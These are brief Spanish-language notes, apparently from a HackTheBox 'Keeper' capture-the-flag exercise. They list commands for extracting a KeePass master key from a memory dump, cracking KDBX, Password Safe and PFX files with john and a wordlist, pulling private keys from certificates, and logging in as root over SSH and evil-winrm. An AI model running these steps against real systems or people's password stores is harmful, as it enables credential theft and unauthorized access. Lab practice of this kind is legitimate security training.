Keeper

Para extraer la masterkey de un dmp de keepass (volcado de memoria)

python3 poc.py -d KeePassDumpFull.dmp

Para abrir un kdbx

keepassxc passcodes.kdbx

Para convertir una putty key en una pem:

https://tecadmin.net/convert-ppk-to-pem-using-command/

puttygen private.key -O private-openssh -o id_rsa

ssh -i id_rsa root@keeper.htb

Crack KDBX

keepass2john CEH.kdbx > CEH.kdbx.hash

john CEH.kdbx.hash --wordlist=/usr/share/wordlists/rockyou.txt

keepassxc CEH.kdbx

Crack pwSafe

pwsafe2john Backup.psafe3
john hash

.PFX

openssl pkcs12 -in archivo.pfx -info

/usr/share/john/pfx2john.py archivo.pfx > dev_auth.hash

Extraer PEM

openssl pkcs12 -in archivo.pfx -nocerts -out key.pem -nodes

Extraer el certificado

openssl pkcs12 -in legacyy_dev_auth.pfx -nokeys -out key.cert

Por ejemplo para conectarse por secure evil-winrm

evil-winrm -c key.cert -k key.pem -i <target ip> -P 5986 -S